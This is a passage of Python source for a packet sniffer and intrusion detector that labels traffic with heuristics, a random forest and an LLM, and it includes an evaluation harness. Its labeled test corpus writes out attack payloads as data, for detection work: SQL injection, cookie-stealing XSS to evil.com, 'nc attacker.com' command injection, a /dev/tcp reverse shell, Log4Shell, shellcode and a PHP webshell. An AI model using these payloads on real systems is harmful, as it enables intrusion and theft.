"(CPU LLM can't keep up at this rate).", self._llm_dropped)
return
ip_str = None
if packet.haslayer(IP):
ip_str = packet[IP].src
ip_obj = ipaddress.ip_address(ip_str)
if self.args.local_only and not ip_obj.is_private:
return
if not self.args.local_only and ip_obj.is_private:
return
elif packet.haslayer(IPv6):
ip_str = packet[IPv6].src
ip_obj = ipaddress.ip_address(ip_str)
if self.args.local_only and not ip_obj.is_private:
return
if not self.args.local_only and ip_obj.is_private:
return
else:
self.logger.warning("Packet without IP/IPv6 layer")
return
if not self.args.local_only and self.args.red_alert:
future = self.async_runner.run_coroutine(self.ip_lookup.get_ip_info(ip_str))
try:
ip_info = future.result(timeout=6)
country = ip_info.get("country", "").upper()
if country in self.args.whitelist:
self.logger.info("Skipping packet from whitelisted country: %s", country)
return
except Exception as e:
self.logger.exception("Error during red alert IP filtering: %s", e)
self.logger.info("=" * 80)
self.logger.info("Packet: %s", packet.summary())
summary_str = packet.summary()
dns_match = re.search(r"DNS Qry b'([^']+)'", summary_str)
if dns_match:
dns_query = dns_match.group(1)
if not self.dns_parser.is_blacklisted(dns_query):
self.dns_logger.info("DNS Query (fallback): %s", dns_query)
if packet.haslayer(DNS):
dns_layer = packet[DNS]
if dns_layer.qr == 0 and dns_layer.qd is not None:
try:
if isinstance(dns_layer.qd, DNSQR):
dns_query = (dns_layer.qd.qname.decode()
if isinstance(dns_layer.qd.qname, bytes)
else dns_layer.qd.qname)
else:
dns_query = ", ".join(
q.qname.decode() if isinstance(q.qname, bytes) else q.qname
for q in dns_layer.qd
)
except Exception as e:
dns_query = str(dns_layer.qd)
self.logger.info("DNS Query (from DNS layer): %s", dns_query)
try:
raw_dns_payload = bytes(dns_layer)
self.dns_parser.parse_dns_payload(raw_dns_payload)
except Exception as e:
self.logger.exception("Error processing DNS layer: %s", e)
if packet.haslayer(Ether):
eth = packet[Ether]
self.logger.info("Ethernet: src=%s, dst=%s, type=0x%04x", eth.src, eth.dst, eth.type)
else:
self.logger.warning("No Ethernet layer found.")
return
if packet.haslayer(ARP):
arp = packet[ARP]
self.logger.info("ARP: op=%s, src=%s, dst=%s", arp.op, arp.psrc, arp.pdst)
return
if packet.haslayer(IP):
ip_layer = packet[IP]
self.logger.info("IPv4: src=%s, dst=%s, ttl=%s, proto=%s",
ip_layer.src, ip_layer.dst, ip_layer.ttl, ip_layer.proto)
elif packet.haslayer(IPv6):
ip_layer = packet[IPv6]
self.logger.info("IPv6: src=%s, dst=%s, hlim=%s",
ip_layer.src, ip_layer.dst, ip_layer.hlim)
if packet.haslayer(TCP):
tcp_layer = packet[TCP]
self.logger.info("TCP: sport=%s, dport=%s", tcp_layer.sport, tcp_layer.dport)
app_name, app_details = self.identify_application(tcp_layer.sport, tcp_layer.dport)
self.logger.info("Identified Application: %s (%s)", app_name, app_details)
if packet.haslayer(Raw):
tcp_payload = bytes(packet[Raw].load)
self._analyze_reassembled_tcp(
src_ip=ip_layer.src,
src_port=tcp_layer.sport,
dst_ip=ip_layer.dst,
dst_port=tcp_layer.dport,
tcp_seq=int(tcp_layer.seq),
payload=tcp_payload,
)
if app_name == "HTTPS" or (TLS and packet.haslayer(TLS)):
if TLS and packet.haslayer(TLS):
tls_layer = packet[TLS]
self.logger.info("TLS Record: %s", tls_layer.summary())
if packet.haslayer(TLSClientHello):
client_hello = packet[TLSClientHello]
self.logger.info("TLS ClientHello: %s", client_hello.summary())
if hasattr(client_hello, 'servernames'):
self.logger.info("SNI: %s", client_hello.servernames)
else:
if packet.haslayer(Raw):
payload = bytes(packet[Raw].load)
self.payload_parser.parse_tls_payload(payload)
keylog = os.getenv("SSLKEYLOGFILE", "")
if keylog:
self.logger.info("TLS plaintext decryption can use SSLKEYLOGFILE at: %s", keylog)
else:
self.logger.info("TLS inspection limited to metadata (SNI/JA3/cert) unless SSLKEYLOGFILE or interception is configured.")
else:
if packet.haslayer(Raw):
payload = bytes(packet[Raw].load)
self.parse_payload(packet, app_name, payload)
elif packet.haslayer(UDP):
udp_layer = packet[UDP]
self.logger.info("UDP: sport=%s, dport=%s", udp_layer.sport, udp_layer.dport)
app_name, app_details = self.identify_application(udp_layer.sport, udp_layer.dport)
self.logger.info("Identified Application: %s (%s)", app_name, app_details)
if packet.haslayer(Raw):
payload = bytes(packet[Raw].load)
if app_name == "DNS":
parsed_dns = self.protocol_decoder.decode_dns(payload)
self.correlator.add_event(ip_layer.src, "dns_query", {"query": parsed_dns.get("query", "")})
self.parse_payload(packet, app_name, payload)
elif packet.haslayer(ICMP):
icmp_layer = packet[ICMP]
self.logger.info("ICMP: type=%s, code=%s", icmp_layer.type, icmp_layer.code)
else:
self.logger.warning("Unsupported transport layer.")
def run(self) -> None:
self.logger.info("Starting Enhanced Packet Sniffer on interface '%s'", self.args.interface)
backend_ok, backend_msg = check_packet_capture_backend(logger=self.logger)
if not backend_ok:
self.logger.error("%s", backend_msg)
return
try:
bpf_filter = "ip" if not self.args.local_only else ""
sniff(iface=self.args.interface, prn=self.packet_handler, store=0, filter=bpf_filter)
except KeyboardInterrupt:
self.logger.info("Stopping packet capture (KeyboardInterrupt received)...")
except Exception as e:
self.logger.exception("Error during packet capture: %s", e)
finally:
if self._llm_queue is not None:
pending = self._llm_queue.unfinished_tasks
if pending:
self.logger.info("Draining %d queued LLM analyses...", pending)
self._llm_queue.join()
if self._llm_dropped:
self.logger.warning("Dropped %d packets total under LLM load.", self._llm_dropped)
def get_llm_labeler(args: argparse.Namespace, logger: Optional[logging.Logger] = None):
"""Return a local LLM labeler instance, or None if unavailable/not selected."""
logger = logger or logging.getLogger(__name__)
backend = getattr(args, "llm_backend", "local")
if backend != "local":
return None
if Llama is None:
logger.error("Local LLM backend requested but llama-cpp-python is not installed. "
"Run with --install, or use --llm-backend openai.")
return None
return get_labeler(
model_key=getattr(args, "llm_model", DEFAULT_MODEL_KEY),
model_path=getattr(args, "llm_model_path", None) or None,
logger=logger,
)
def classify_packet_llm(labeler, backend: str, *, summary: str = "", normalized_payload: str = "",
hex_payload: str = "", packet_details: str = "", protocol: str = "",
src: str = "", dst: str = "", entropy: Optional[float] = None,
logger: Optional[logging.Logger] = None) -> Tuple[int, Dict[str, Any]]:
"""Classify a packet with the selected LLM backend.
Returns (label, details) where label is 1 (malicious) or 0 (benign) and
details carries the structured verdict for local-LLM mode.
"""
logger = logger or logging.getLogger(__name__)
if backend == "local" and labeler is not None:
result = labeler.label(
summary=summary, protocol=protocol, src=src, dst=dst,
normalized_payload=normalized_payload, hex_payload=hex_payload,
entropy=entropy,
)
return result.label, result.to_dict()
if backend == "openai":
label = llm_label_packet(summary, normalized_payload, hex_payload, packet_details, logger=logger)
return label, {"verdict": "malicious" if label else "benign", "backend": "openai"}
return 0, {"error": "no LLM backend available"}
async def async_llm_label_packet(packet_summary: str, normalized_payload: str, hex_payload: str, packet_details: str, logger: Optional[logging.Logger] = None) -> int:
"""
Uses the AsyncOpenAI client to determine if a packet is malicious or benign.
Returns 1 if the answer indicates 'malicious', 0 otherwise.
"""
logger = logger or logging.getLogger(__name__)
if AsyncOpenAI is None:
logger.error("AsyncOpenAI client is not available. Please install the openai package (>=1.0.0).")
return 0
api_key = os.getenv("OPENAI_API_KEY")
if not api_key:
logger.error("OpenAI API key not found in environment (OPENAI_API_KEY).")
return 0
client = AsyncOpenAI(api_key=api_key)
xdp_details = get_xdp_metadata_details()
prompt = (
f"Examine the following packet details and decide if the packet is malicious or benign.\n\n"
f"Packet Summary:\n{packet_summary}\n\n"
f"Packet Detailed Info (Scapy dump):\n{packet_details}\n\n"
f"Normalized Payload (first 300 characters):\n{normalized_payload[:300]}\n\n"
f"Hex Payload (first 200 characters):\n{hex_payload[:200]}\n\n"
f"{xdp_details}\n\n"
"Answer with a single word: 'malicious' or 'benign'."
)
logger.debug("LLM Prompt:\n%s", prompt)
try:
response = await client.chat.completions.create(
model="gpt-3.5-turbo",
messages=[
{"role": "system", "content": "You are a network security analyst."},
{"role": "user", "content": prompt}
],
max_tokens=10,
temperature=0
)
answer = response.choices[0].message.content.strip().lower()
logger.debug("LLM response: %s", answer)
return 1 if "malicious" in answer else 0
except Exception as e:
logger.exception("Error querying OpenAI API: %s", e)
return 0
def llm_label_packet(packet_summary: str, normalized_payload: str, hex_payload: str, packet_details: str, logger: Optional[logging.Logger] = None) -> int:
"""
Synchronous wrapper for async_llm_label_packet.
"""
logger = logger or logging.getLogger(__name__)
new_loop = asyncio.new_event_loop()
try:
result = new_loop.run_until_complete(
async_llm_label_packet(packet_summary, normalized_payload, hex_payload, packet_details, logger=logger)
)
return result
except Exception as e:
logger.exception("Error in LLM labeling: %s", e)
return 0
finally:
new_loop.run_until_complete(new_loop.shutdown_asyncgens())
new_loop.close()
def build_dataset_main(interface: str, num_samples: int, output_path: str, use_llm: bool,
logger: Optional[logging.Logger] = None,
args: Optional[argparse.Namespace] = None) -> None:
"""
Captures packets with a Raw payload and labels them.
If use_llm is True, the configured LLM backend (local GGUF by default) labels
each packet automatically. The results are saved to a CSV file.
"""
logger = logger or logging.getLogger(__name__)
logger.info("Starting dataset capture on interface %s; capturing %d samples.", interface, num_samples)
samples = []
backend = getattr(args, "llm_backend", "local") if args is not None else "local"
labeler = None
if use_llm and backend == "local":
labeler = get_llm_labeler(args, logger=logger) if args is not None else (
get_labeler(logger=logger) if Llama is not None else None)
if labeler is not None:
logger.info("Warming up local LLM for labeling...")
labeler.warmup()
def packet_callback(packet):
if packet.haslayer(Raw):
payload = bytes(packet[Raw].load)
hex_payload = payload.hex()
normalized_payload = PayloadParser(logger=logger).normalize_payload(payload)
packet_summary = packet.summary()
packet_details = packet.show(dump=True) if backend == "openai" else ""
print("\nPacket captured:")
print(packet_summary)
print("Normalized Payload (first 40 characters):", normalized_payload[:40])
if use_llm:
label, details = classify_packet_llm(
labeler, backend, summary=packet_summary,
normalized_payload=normalized_payload, hex_payload=hex_payload,
packet_details=packet_details, logger=logger)
print(f"LLM labeled this packet as: {'malicious' if label == 1 else 'benign'}"
+ (f" ({details.get('category','')}, conf={details.get('confidence',0):.2f})"
if details.get('category') else ""))
else:
user_input = input("Label this packet as malicious (1) or benign (0) [default=0]: ").strip()
label = int(user_input) if user_input in ["0", "1"] else 0
samples.append({"payload": hex_payload, "label": label})
if len(samples) >= num_samples:
return True
return False
scapy.sniff(iface=interface, prn=packet_callback, store=0, timeout=60)
if samples:
try:
with open(output_path, "w", newline="") as csvfile:
fieldnames = ["payload", "label"]
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writeheader()
for sample in samples:
writer.writerow(sample)
logger.info("Dataset built and saved to %s (%d samples).", output_path, len(samples))
except Exception as e:
logger.error("Failed to write dataset to %s: %s", output_path, e)
else:
logger.error("No samples were captured.")
# ===========================================================================
# ML training + AI evaluation harness (merged in for single-file gist).
# ===========================================================================
@dataclass(frozen=True)
class EvalSample:
name: str
protocol: str
payload: bytes
label: int # 1 malicious, 0 benign
category: str
def _eb(s: str) -> bytes:
return s.encode("utf-8", "ignore")
def eval_corpus() -> List[EvalSample]:
"""Small labeled ground-truth corpus for evaluating/training the AI layer."""
benign = [
EvalSample("http_get_news", "http1",
_eb("GET /news/world HTTP/1.1\r\nHost: bbc.co.uk\r\n"
"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)\r\n"
"Accept: text/html\r\nAccept-Encoding: gzip, deflate\r\n\r\n"), 0, "benign"),
EvalSample("http_api_json", "http1",
_eb("POST /api/v2/users HTTP/1.1\r\nHost: api.example.com\r\n"
"Content-Type: application/json\r\nAuthorization: Bearer eyJhbGc\r\n"
"Content-Length: 47\r\n\r\n{\"name\":\"alice\",\"email\":\"a@x.com\"}"), 0, "benign"),
EvalSample("http_json_response", "http1",
_eb("HTTP/1.1 200 OK\r\nContent-Type: application/json\r\nServer: nginx\r\n\r\n"
"{\"status\":\"ok\",\"items\":[1,2,3],\"page\":1}"), 0, "benign"),
EvalSample("http_static_css", "http1",
_eb("GET /assets/main.css HTTP/1.1\r\nHost: cdn.site.com\r\n"
"Accept: text/css\r\nReferer: https://site.com/\r\n\r\n"), 0, "benign"),
EvalSample("http_search_query", "http1",
_eb("GET /search?q=best+pizza+near+me&lang=en HTTP/1.1\r\n"
"Host: www.google.com\r\nUser-Agent: Mozilla/5.0\r\n\r\n"), 0, "benign"),
EvalSample("dns_google", "dns", _eb("standard query A www.google.com"), 0, "benign"),
EvalSample("dns_cdn", "dns", _eb("standard query A fastly.net.cdn.cloudflare.net"), 0, "benign"),
EvalSample("dns_update", "dns", _eb("standard query A update.microsoft.com"), 0, "benign"),
EvalSample("dns_aaaa", "dns", _eb("standard query AAAA github.com"), 0, "benign"),
EvalSample("tls_clienthello", "tls",
bytes.fromhex("1603010020010000fc0303") + b"\x00" * 40, 0, "benign"),
EvalSample("smtp_normal", "smtp",
_eb("EHLO mail.example.com\r\nMAIL FROM:<bob@example.com>\r\n"
"RCPT TO:<alice@corp.com>\r\nDATA\r\nSubject: Lunch?\r\n\r\n"), 0, "benign"),
EvalSample("http_form_login", "http1",
_eb("POST /login HTTP/1.1\r\nHost: shop.com\r\n"
"Content-Type: application/x-www-form-urlencoded\r\n\r\n"
"username=john&password=hunter2&remember=1"), 0, "benign"),
EvalSample("http_image_get", "http1",
_eb("GET /img/logo.png HTTP/1.1\r\nHost: site.com\r\nAccept: image/png\r\n\r\n"), 0, "benign"),
EvalSample("ntp_like", "other", bytes.fromhex("1b00000000000000") + b"\x00" * 40, 0, "benign"),
EvalSample("http_chunked_html", "http1",
_eb("HTTP/1.1 200 OK\r\nTransfer-Encoding: chunked\r\n\r\n"
"1a\r\n<html><body>Hello world</\r\n0\r\n\r\n"), 0, "benign"),
EvalSample("dns_office", "dns", _eb("standard query A outlook.office365.com"), 0, "benign"),
]
malicious = [
EvalSample("sqli_union", "http1",
_eb("GET /product?id=1 UNION SELECT username,password FROM users-- HTTP/1.1\r\n"
"Host: shop.com\r\n\r\n"), 1, "sqli"),
EvalSample("sqli_or", "http1",
_eb("POST /login HTTP/1.1\r\nHost: site.com\r\n\r\nuser=admin'--&pass=x' OR '1'='1"), 1, "sqli"),
EvalSample("sqli_blind", "http1",
_eb("GET /item?id=1 AND SLEEP(5)-- HTTP/1.1\r\nHost: x.com\r\n\r\n"), 1, "sqli"),
EvalSample("xss_script", "http1",
_eb("GET /search?q=<script>document.location='http://evil.com/c?'+document.cookie</script> "
"HTTP/1.1\r\nHost: site.com\r\n\r\n"), 1, "xss"),
EvalSample("xss_img_onerror", "http1",
_eb("POST /comment HTTP/1.1\r\nHost: blog.com\r\n\r\n"
"text=<img src=x onerror=alert(document.cookie)>"), 1, "xss"),
EvalSample("cmd_injection", "http1",
_eb("GET /ping?host=8.8.8.8;cat+/etc/passwd HTTP/1.1\r\nHost: router.local\r\n\r\n"),
1, "command_injection"),
EvalSample("cmd_inject_pipe", "http1",
_eb("GET /api/exec?cmd=ls|nc+attacker.com+4444 HTTP/1.1\r\nHost: x\r\n\r\n"),
1, "command_injection"),
EvalSample("path_traversal", "http1",
_eb("GET /download?file=../../../../etc/passwd HTTP/1.1\r\nHost: files.com\r\n\r\n"),
1, "path_traversal"),
EvalSample("path_traversal_enc", "http1",
_eb("GET /static/..%2f..%2f..%2fwindows%2fwin.ini HTTP/1.1\r\nHost: x\r\n\r\n"),
1, "path_traversal"),
EvalSample("log4shell", "http1",
_eb("GET / HTTP/1.1\r\nHost: site.com\r\n"
"User-Agent: ${jndi:ldap://198.51.100.7:1389/Exploit}\r\n\r\n"), 1, "exploit"),
EvalSample("reverse_shell", "other",
_eb("bash -i >& /dev/tcp/198.51.100.9/4444 0>&1"), 1, "command_injection"),
EvalSample("powershell_enc", "http1",
_eb("POST /upload HTTP/1.1\r\nHost: x\r\n\r\npowershell -nop -w hidden -enc "
"JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAA"), 1, "malware_download"),
EvalSample("eicar", "http1",
_eb("HTTP/1.1 200 OK\r\nContent-Type: application/octet-stream\r\n\r\n"
"X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"),
1, "malware_download"),
EvalSample("pe_download", "http1",
_eb("HTTP/1.1 200 OK\r\nContent-Type: application/octet-stream\r\n"
"Content-Disposition: attachment; filename=invoice.exe\r\n\r\n")
+ b"MZ\x90\x00\x03" + b"\x00" * 200, 1, "malware_download"),
EvalSample("shellcode_nop", "other",
b"\x90" * 64 + b"\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80",
1, "shellcode"),
EvalSample("dga_domain", "dns", _eb("standard query A kq3v9z7xj1n4plw8d2rmh.biz"), 1, "dga"),
EvalSample("dga_domain2", "dns", _eb("standard query A xkqwzbvnmpljhgfdsa7392.com"), 1, "dga"),
EvalSample("webshell_upload", "http1",
_eb("POST /uploads/shell.php HTTP/1.1\r\nHost: victim.com\r\n\r\n"
"<?php system($_GET['cmd']); ?>"), 1, "command_injection"),
EvalSample("data_exfil", "http1",
_eb("POST /collect HTTP/1.1\r\nHost: 198.51.100.23\r\n"
"Content-Type: application/octet-stream\r\nContent-Length: 9000\r\n\r\n")
+ b"\xa3\x7f\x11\xde" * 400, 1, "data_exfil"),
EvalSample("smb_exploit", "other",
b"\xffSMB\x72\x00\x00\x00\x00" + b"\x00" * 8 + b"\xff\xff" + b"\x41" * 40, 1, "exploit"),
EvalSample("user_agent_sqlmap", "http1",
_eb("GET /?id=1 HTTP/1.1\r\nHost: x.com\r\nUser-Agent: sqlmap/1.6.12\r\n\r\n"), 1, "recon_scan"),
EvalSample("nikto_scan", "http1",
_eb("GET /admin.php HTTP/1.1\r\nHost: x.com\r\n"
"User-Agent: Mozilla/5.00 (Nikto/2.1.6)\r\n\r\n"), 1, "recon_scan"),
]
return benign + malicious
def train_ml_model(model_output_path: str = "model.pkl", csv_path: str = "",
logger: Optional[logging.Logger] = None) -> Optional[dict]:
"""Train the line-rate RandomForest on rich features.
From a sniffer-built CSV (payload[hex], label) when csv_path is given,
otherwise from the built-in eval_corpus(). Saves a versioned bundle.
"""
logger = logger or logging.getLogger(__name__)
try:
from sklearn.ensemble import RandomForestClassifier
import joblib
except Exception as e:
logger.error("scikit-learn/joblib required for training: %s", e)
return None
X, y = [], []
if csv_path:
try:
import pandas as pd
df = pd.read_csv(csv_path)
except Exception as e:
logger.error("Failed to load dataset %s: %s", csv_path, e)
return None
for _, row in df.iterrows():
try:
payload = bytes.fromhex(str(row["payload"]))
except Exception:
continue
X.append(compute_feature_vector(payload))
y.append(int(row.get("label", 0)))
logger.info("Loaded %d labeled rows from %s", len(y), csv_path)
else:
for s in eval_corpus():
X.append(compute_feature_vector(s.payload))
y.append(s.label)
logger.info("Using built-in corpus: %d samples", len(y))
if not X:
logger.error("No valid training samples found.")
return None
X = np.array(X, dtype=float)
y = np.array(y, dtype=int)
clf = RandomForestClassifier(n_estimators=200, class_weight="balanced",
random_state=42, n_jobs=-1)
clf.fit(X, y)
bundle = {"model": clf, "feature_names": FEATURE_NAMES, "version": 2}
joblib.dump(bundle, model_output_path)
logger.info("Saved model -> %s (%d features)", model_output_path, X.shape[1])
return bundle
def _metrics(y_true: List[int], y_pred: List[int]) -> dict:
tp = sum(1 for t, p in zip(y_true, y_pred) if t == 1 and p == 1)
fp = sum(1 for t, p in zip(y_true, y_pred) if t == 0 and p == 1)
tn = sum(1 for t, p in zip(y_true, y_pred) if t == 0 and p == 0)
fn = sum(1 for t, p in zip(y_true, y_pred) if t == 1 and p == 0)
prec = tp / (tp + fp) if (tp + fp) else 0.0
rec = tp / (tp + fn) if (tp + fn) else 0.0
f1 = 2 * prec * rec / (prec + rec) if (prec + rec) else 0.0
acc = (tp + tn) / len(y_true) if y_true else 0.0
return {"tp": tp, "fp": fp, "tn": tn, "fn": fn,
"precision": prec, "recall": rec, "f1": f1, "accuracy": acc}
def _old_baseline_pred(s: EvalSample) -> int:
return 1 if (len(s.payload) > 1000 and shannon_entropy(s.payload) > 7.0) else 0
def _heuristic_pred(s: EvalSample) -> int:
low = s.payload.lower()
for tok, _ in ATTACK_TOKENS:
if tok in low and tok not in (b";", b"|", b"--", b"select "):
return 1
if s.payload[:2] == b"MZ" or s.payload[:4] in (b"\xfeSMB", b"\xffSMB"):
return 1
if len(s.payload) > 2000 and shannon_entropy(s.payload[:4096]) > 7.3:
return 1
if s.protocol == "dns":
for word in low.split():
lab = word.split(b".")[0]
if len(lab) >= 14 and sum(c in b"aeiou" for c in lab) <= 2:
return 1
return 0
def _ml_cv_preds(samples: List[EvalSample]) -> List[int]:
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import StratifiedKFold
X = np.array([compute_feature_vector(s.payload) for s in samples], dtype=float)
y = np.array([s.label for s in samples], dtype=int)
preds = np.zeros(len(y), dtype=int)
skf = StratifiedKFold(n_splits=5, shuffle=True, random_state=42)
for tr, te in skf.split(X, y):
clf = RandomForestClassifier(n_estimators=200, class_weight="balanced",
random_state=42, n_jobs=-1)
clf.fit(X[tr], y[tr])
preds[te] = clf.predict(X[te])
return preds.tolist()
def run_eval(args: argparse.Namespace, logger: Optional[logging.Logger] = None) -> None:
"""Score OLD/heuristics/ML/LLM + ensemble on the labeled corpus."""
logger = logger or logging.getLogger(__name__)
samples = eval_corpus()
y = [s.label for s in samples]
def row(name, m, secs):
print(f"{name:16s} P={m['precision']:.2f} R={m['recall']:.2f} "
f"F1={m['f1']:.2f} Acc={m['accuracy']:.2f} "
f"[TP={m['tp']} FP={m['fp']} TN={m['tn']} FN={m['fn']}] {secs:.1f}s")
print(f"\nCorpus: {len(samples)} samples ({sum(y)} malicious, {len(y)-sum(y)} benign)\n")
print(f"{'classifier':16s} precision/recall/F1/accuracy + confusion")
print("-" * 78)
t = time.time(); p_old = [_old_baseline_pred(s) for s in samples]
row("OLD (len+ent)", _metrics(y, p_old), time.time() - t)
t = time.time(); p_heur = [_heuristic_pred(s) for s in samples]
row("Heuristics", _metrics(y, p_heur), time.time() - t)
t = time.time(); p_ml = _ml_cv_preds(samples)
row("NEW ML (5-CV)", _metrics(y, p_ml), time.time() - t)
p_llm = None
if not getattr(args, "no_llm", False):
labeler = get_llm_labeler(args, logger=logger)
if labeler is not None and labeler.available:
t = time.time(); p_llm, details = [], []
for s in samples:
r = labeler.label(protocol=s.protocol,
normalized_payload=s.payload.decode("utf-8", "replace"),
hex_payload=s.payload.hex(),
entropy=shannon_entropy(s.payload))
p_llm.append(r.label); details.append((s, r))
row("Local LLM", _metrics(y, p_llm), time.time() - t)
if getattr(args, "show_errors", False):
print("\nLLM misclassifications:")
for s, r in details:
if r.label != s.label:
print(f" {s.name:20s} true={s.label} pred={r.label} "
f"({r.verdict} {r.confidence:.2f} {r.category}) {r.reason[:60]}")
else:
print(f"{'Local LLM':16s} (unavailable -- install llama-cpp-python)")
if p_llm:
ens = [1 if (a or b) else 0 for a, b in zip(p_heur, p_llm)]
row("Heur OR LLM", _metrics(y, ens), 0.0)
ens_all = [1 if (a or b or c) else 0 for a, b, c in zip(p_heur, p_ml, p_llm)]
row("Heur+ML+LLM", _metrics(y, ens_all), 0.0)
print()
def train_model_main(dataset_path: str, model_output_path: str, logger: Optional[logging.Logger] = None) -> None:
logger = logger or logging.getLogger(__name__)
MLClassifier.train_model(dataset_path, model_output_path, logger=logger)
def get_missing_runtime_dependencies() -> List[str]:
missing = []
dependency_map = [
("aiohttp", aiohttp),
("PyYAML", yaml),
("cachetools", TTLCache),
("numpy", np),
("scapy", scapy),
]
for package_name, module_ref in dependency_map:
if module_ref is None:
missing.append(package_name)
return missing
def detect_operating_system() -> str:
system_name = platform.system().lower()
if system_name.startswith("win"):
return "windows"
if system_name.startswith("linux"):
return "linux"
if system_name.startswith("darwin"):
return "macos"
return "other"
def get_required_pip_packages(os_name: str) -> List[str]:
base_packages = [
"aiohttp",
"PyYAML",
"cachetools",
"numpy",
"scapy",
"yara-python",
"openai",
"psutil",
"pandas",
"scikit-learn",
"joblib",
"huggingface_hub",
]
if os_name == "linux":
return [*base_packages, "bcc"]
return base_packages
def install_npcap_windows(logger: Optional[logging.Logger] = None) -> bool:
logger = logger or logging.getLogger(__name__)
backend_ok, _ = check_packet_capture_backend(logger=logger)
if backend_ok:
logger.info("Npcap already available on this Windows machine.")
return True
npcap_url = "https://npcap.com/dist/npcap-1.87.exe"
installer_path = os.path.join(os.environ.get("TEMP", "."), "npcap-1.87.exe")
logger.info("Npcap not detected. Downloading official installer from %s", npcap_url)
try:
from urllib.request import urlretrieve
urlretrieve(npcap_url, installer_path)
except Exception as exc:
logger.error("Failed to download Npcap installer: %s", exc)
return False
logger.info("Launching Npcap installer (may prompt for UAC/admin approval)...")
try:
subprocess.run([installer_path], check=True)
except subprocess.CalledProcessError as exc:
logger.error("Npcap installer exited with code %s", exc.returncode)
return False
except Exception as exc:
logger.error("Failed to launch Npcap installer: %s", exc)
return False
backend_ok, backend_msg = check_packet_capture_backend(logger=logger)
if not backend_ok:
logger.error("Npcap still not available after installer run: %s", backend_msg)
return False
logger.info("Npcap installation verified successfully.")
return True
def install_dependencies(logger: Optional[logging.Logger] = None) -> bool:
logger = logger or logging.getLogger(__name__)
os_name = detect_operating_system()
packages = get_required_pip_packages(os_name)
logger.info("Detected operating system: %s", os_name)
logger.info("Installing OS-specific Python dependencies...")
logger.info("Installing dependencies with pip3...")
pip_install_succeeded = False
try:
subprocess.run(["pip3", "install", *packages], check=True)
logger.info("Dependencies installed successfully via pip3.")
pip_install_succeeded = True
except FileNotFoundError:
logger.warning("pip3 not found. Falling back to python -m pip.")
except subprocess.CalledProcessError as exc:
logger.warning("pip3 install returned an error (%s). Falling back to python -m pip.", exc.returncode)
if not pip_install_succeeded:
try:
subprocess.run([sys.executable, "-m", "pip", "install", *packages], check=True)
logger.info("Dependencies installed successfully via python -m pip.")
pip_install_succeeded = True
except subprocess.CalledProcessError as exc:
logger.error("Dependency installation failed (exit code %s).", exc.returncode)
return False
except Exception as exc:
logger.error("Dependency installation failed: %s", exc)
return False
if not pip_install_succeeded:
logger.error("Dependency installation did not complete successfully.")
return False
# llama-cpp-python: prefer the prebuilt CPU wheel index (avoids a slow/fragile
# source build, and the Windows long-path extraction failure).
logger.info("Installing llama-cpp-python (prebuilt CPU wheel)...")
try:
subprocess.run(
[sys.executable, "-m", "pip", "install", "llama-cpp-python",
"--extra-index-url", "https://abetlen.github.io/llama-cpp-python/whl/cpu"],
check=True,
)
logger.info("llama-cpp-python installed.")
except Exception as exc:
logger.warning("llama-cpp-python install failed (%s). Local LLM mode will be "
"unavailable; --llm-backend openai still works.", exc)
if os_name == "windows":
if not install_npcap_windows(logger=logger):
logger.error("Windows install phase incomplete: Npcap setup failed.")
return False
return True
def is_likely_loopback(interface_name: str) -> bool:
lowered = interface_name.lower()
loopback_markers = ["loopback", "lo", "npcap loopback", "software loopback"]
return any(marker in lowered for marker in loopback_markers)
def auto_detect_interface(logger: Optional[logging.Logger] = None) -> str:
logger = logger or logging.getLogger(__name__)
try:
default_iface = str(scapy.conf.iface)
if default_iface and not is_likely_loopback(default_iface):
logger.info("Auto-detected interface from Scapy default: %s", default_iface)
return default_iface
except Exception:
logger.debug("Unable to use Scapy default interface for auto-detection.")
try:
routed_iface = scapy.conf.route.route("8.8.8.8")[0]
if routed_iface and not is_likely_loopback(routed_iface):
logger.info("Auto-detected interface from routing table: %s", routed_iface)
return routed_iface
except Exception:
logger.debug("Unable to use routing table for interface auto-detection.")
try:
interfaces = scapy.get_if_list()
for iface in interfaces:
if iface and not is_likely_loopback(iface):
logger.info("Auto-detected interface from interface list: %s", iface)
return iface
if interfaces:
logger.info("Falling back to first available interface: %s", interfaces[0])
return interfaces[0]
except Exception as exc:
logger.debug("Failed to list interfaces during auto-detection: %s", exc)
raise RuntimeError("Could not auto-detect a usable network interface.")
def parse_arguments() -> argparse.Namespace:
parser = argparse.ArgumentParser(
description="Enhanced Packet Sniffer with Red Alert, Whitelist, Sentry Mode, Dataset Building, Training, and LLM-assisted Labeling"
)
parser.add_argument("-i", "--interface", type=str, default="",
help="Network interface to sniff on")
parser.add_argument("--install", action="store_true",
help="Install required Python dependencies using pip3 and exit")
parser.add_argument("--start", action="store_true",
help="Start sniffing with automatic interface detection when --interface is not provided")
parser.add_argument("-l", "--logfile", type=str, default="sniffer.log",
help="Path to the main log file")
parser.add_argument("--no-bgcheck", action="store_true",
help="Disable IP background lookup")
parser.add_argument("--local-only", action="store_true",
help="Capture only local (private) traffic")
parser.add_argument("--red-alert", action="store_true",
help="Enable red alert mode: only log packets from non-allied countries")
parser.add_argument("--whitelist", type=str, default="US",
help="Comma-separated list of allied (whitelisted) country codes (default: US)")
parser.add_argument("--sentry", action="store_true",
help="Enable sentry mode (ML-based blocking of malicious packets)")
parser.add_argument("--model-path", type=str, default="model.pkl",
help="Path to the ML model file (used in sentry mode)")
parser.add_argument("--train", action="store_true",
help="Run training mode to build a new ML model from a dataset")
parser.add_argument("--dataset", type=str, default="",
help="Path to the CSV dataset for training")
parser.add_argument("--build-dataset", action="store_true",
help="Capture and build a labeled dataset interactively")
parser.add_argument("--num-samples", type=int, default=10,
help="Number of samples to capture when building the dataset")
parser.add_argument("--dataset-out", type=str, default="training_data.csv",
help="Path to save the built dataset CSV file")
parser.add_argument("--llm-label", action="store_true",
help="Automatically label packets with the LLM in dataset building mode")
parser.add_argument("--llm-backend", type=str, default="local", choices=["local", "openai"],
help="LLM backend: 'local' (GGUF via llama.cpp, default, free) or 'openai'")
parser.add_argument("--llm-model", type=str, default="qwen2.5-3b",
help="Local model key: qwen2.5-3b (default), qwen2.5-1.5b, qwen2.5-0.5b")
